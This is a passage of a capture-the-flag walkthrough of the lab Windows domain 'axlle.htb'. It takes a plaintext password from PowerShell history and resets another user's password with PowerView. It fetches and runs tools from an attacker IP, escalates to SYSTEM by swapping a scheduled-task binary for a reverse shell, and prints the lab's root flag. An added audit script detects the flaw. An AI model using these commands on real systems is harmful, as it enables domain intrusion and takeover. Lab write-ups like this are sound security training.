NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
AXLLE\Web Devs Group S-1-5-21-1005535646-190407494-3473065389-1127 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\dallon.matrix>powershell
PS C:\> Get-ADGroup -Properties * -Identity 'Web Devs'
CanonicalName : axlle.htb/Users/Web Devs
CN : Web Devs
Created : 1/2/2024 5:42:37 AM
createTimeStamp : 1/2/2024 5:42:37 AM
Deleted :
Description : Web Wizards
DisplayName : Web Devs
DistinguishedName : CN=Web Devs,CN=Users,DC=axlle,DC=htb
dSCorePropagationData : {1/2/2024 6:33:15 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:02:13 AM, 12/31/1600 4:00:00 PM}
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
HomePage :
instanceType : 4
isDeleted :
LastKnownParent :
ManagedBy :
member : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
MemberOf : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
Modified : 1/2/2024 6:33:15 AM
modifyTimeStamp : 1/2/2024 6:33:15 AM
Name : Web Devs
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass : group
ObjectGUID : 30b2b798-6b14-4019-9d49-63d72056520e
objectSid : S-1-5-21-1005535646-190407494-3473065389-1127
ProtectedFromAccidentalDeletion : False
SamAccountName : Web Devs
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-1005535646-190407494-3473065389-1127
SIDHistory : {}
uSNChanged : 41228
uSNCreated : 41081
whenChanged : 1/2/2024 6:33:15 AM
whenCreated : 1/2/2024 5:42:37 AM
Access to C:\App Development is still denied to us. Checking the PowerShell history reveals the user's password:
PS C:\Users\dallon.matrix\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);
Creds:
dallon.matrix:PJsO1du$CVJ#D
Since we have credentials, we can collect information about the DC with BloodHound. Refer to: [[Bloodhound]]

To show all of a group's permissions: select the group -> First Degree Object Control.

It looks like we can reset the passwords of two users: jacob.greeny and baz.humphries.
The Hacker Recipes: ForceChangePassword. Docs: https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainUserPassword/ Scripts: https://github.com/PowerShellMafia/PowerSploit
└─$ cp /opt/PowerSploit/Recon/PowerView.ps1 .
---
PS C:\users\public> IEX (IWR 10.10.16.75/PowerView.ps1 -UseBasicParsing)
PS C:\users\public> $NewPassword = ConvertTo-SecureString 'Password123$' -AsPlainText -Force
PS C:\users\public> Set-DomainUserPassword -Identity 'jacob.greeny' -AccountPassword $NewPassword
PS C:\> iwr 10.10.16.75/RunasCs.exe -o \users\public\rc.exe
meterpreter > bg
msf6 exploit(multi/handler) > run -j
msf6 exploit(multi/handler) > sessions 40
meterpreter > shell
C:\>powershell
PS C:\> \users\public\rc.exe 'jacob.greeny' 'Password123$' \users\public\rev.exe
^C
meterpreter > bg
msf6 exploit(multi/handler) > sessions 41
meterpreter > getuid
Server username: AXLLE\jacob.greeny
PS C:\Windows\system32> whoami /all
User Name SID
================== =============================================
axlle\jacob.greeny S-1-5-21-1005535646-190407494-3473065389-1120
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
AXLLE\App Devs Group S-1-5-21-1005535646-190407494-3473065389-1108 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
We are part of App Devs and finally have access to C:\App Development:
PS C:\App Development> tree /f
C:.
+---kbfiltr
kbfiltr.sln
README.md
+---exe
kbftest.c
kbftest.vcxproj
kbftest.vcxproj.Filters
+---sys
kbfiltr.c
kbfiltr.h
kbfiltr.inx
kbfiltr.rc
kbfiltr.vcxproj
kbfiltr.vcxproj.Filters
public.h
rawpdo.c
We have a README.md, so let's check what the project does:
PS C:\App Development\kbfiltr> cat readme.md
## Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.
### Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.
### Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
### Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10
### Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.
### Usage
#### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.
#### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.
#### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.
### Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE
### Bugs
There are probably several.
Zip the directory and download:
PS C:\App Development> & "C:\Program Files (x86)\hMailServer\Bin\7za.exe" a -tzip C:\Users\Public\app.zip .\kbfiltr
meterpreter > download C:\\Users\\Public\\app.zip
The source has nothing interesting, but the comment the developer left is: an automated task running as SYSTEM = cronjob!
meterpreter > cd "C:\\Program Files (x86)\\Windows Kits\\10\\Testing\\StandaloneTesting\\Internal"
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal
==================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2024-01-01 00:57:22 -0500 arm
040777/rwxrwxrwx 0 dir 2024-01-01 00:57:11 -0500 arm64
100777/rwxrwxrwx 71 fil 2023-09-13 21:28:22 -0400 run.bat
100666/rw-rw-rw- 15665 fil 2023-09-30 10:40:52 -0400 run.ps1
100777/rwxrwxrwx 73 fil 2023-09-13 21:28:22 -0400 setup.bat
100666/rw-rw-rw- 14762 fil 2023-09-30 10:41:00 -0400 setup.ps1
100666/rw-rw-rw- 21504 fil 2023-09-30 10:38:44 -0400 standaloneexport.dll
040777/rwxrwxrwx 4096 dir 2024-06-25 09:59:28 -0400 x64
040777/rwxrwxrwx 0 dir 2024-01-01 00:57:23 -0500 x86
It looks like we have 777 permissions on the directory where the binary lives, so since it is launched by the scheduled task as SYSTEM we can replace it with a reverse shell and get SYSTEM.
meterpreter > cd x64
meterpreter > cp standalonerunner.exe standalonerunner.exe.bak
meterpreter > cp C:\\Users\\Public\\rev.exe standalonerunner.exe
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64
======================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2024-06-25 06:50:27 -0400 standalonerunner.exe
100666/rw-rw-rw- 33392 fil 2023-09-30 06:08:18 -0400 standalonerunner.exe.bak
100666/rw-rw-rw- 43632 fil 2023-09-30 06:08:26 -0400 standalonexml.dll
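The weakness here is a binary launched as SYSTEM from a directory that low-privileged users can write to. The following PowerShell audit is an added example (not part of the writeup) that enumerates scheduled tasks running as SYSTEM and reports any whose executable or parent directory grants write access to broad principals; it assumes the automation is registered as a visible scheduled task, and it also checks the x64 directory named in the README directly.

```powershell
# Added audit script, not from the writeup: find SYSTEM scheduled tasks whose
# binary or containing directory is writable by broad, low-privilege groups.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Specific rights that allow replacing or altering the file / directory contents
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete'
# GENERIC_ALL (0x10000000) | GENERIC_WRITE (0x40000000) as they appear on un-mapped ACEs
$GenericWriteMask = 0x50000000

function Get-BroadWriteAccess {
    param([string]$Path)
    if ([string]::IsNullOrEmpty($Path) -or -not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-Acl -LiteralPath $Path).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($BroadPrincipals -contains $_.IdentityReference.Value) -and
            ((([int]$_.FileSystemRights -band [int]$WriteMask) -ne 0) -or
             (([int]$_.FileSystemRights -band $GenericWriteMask) -ne 0))
        } |
        ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }
}

function Find-WritableSystemTaskBinaries {
    $results = @()
    $systemIds = @('SYSTEM', 'NT AUTHORITY\SYSTEM', 'S-1-5-18')
    $tasks = Get-ScheduledTask | Where-Object { $systemIds -contains $_.Principal.UserId }
    foreach ($task in $tasks) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # e.g. COM handler actions
            # Strip surrounding quotes and expand %VARS% before resolving the path
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            $dir = Split-Path -Parent $exe
            $findings = @()
            $findings += Get-BroadWriteAccess -Path $exe | ForEach-Object { "file $_" }
            $findings += Get-BroadWriteAccess -Path $dir | ForEach-Object { "dir $_" }
            if ($findings.Count -gt 0) {
                $results += [pscustomobject]@{
                    Task     = "$($task.TaskPath)$($task.TaskName)"
                    Binary   = $exe
                    Findings = ($findings -join '; ')
                }
            }
        }
    }
    return $results
}

Find-WritableSystemTaskBinaries | Format-List
# The directory from the README, checked directly in case the task is not visible to this user
Get-BroadWriteAccess -Path 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64'
```

The fix on the defending side is to have the directory and binary owned by Administrators with only read/execute for Users, or to move the runner out of a world-writable tree.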
Privilege Escalation (Administrator)
For whatever reason the msfvenom payload was not triggering, so I just decided to use a Golang reverse shell.
Refer to [[Golang Reverse Shell]]
Root.txt
PS C:\users\Administrator> cat Desktop/root.txt
1909061be135bf5f98a16c62b9950436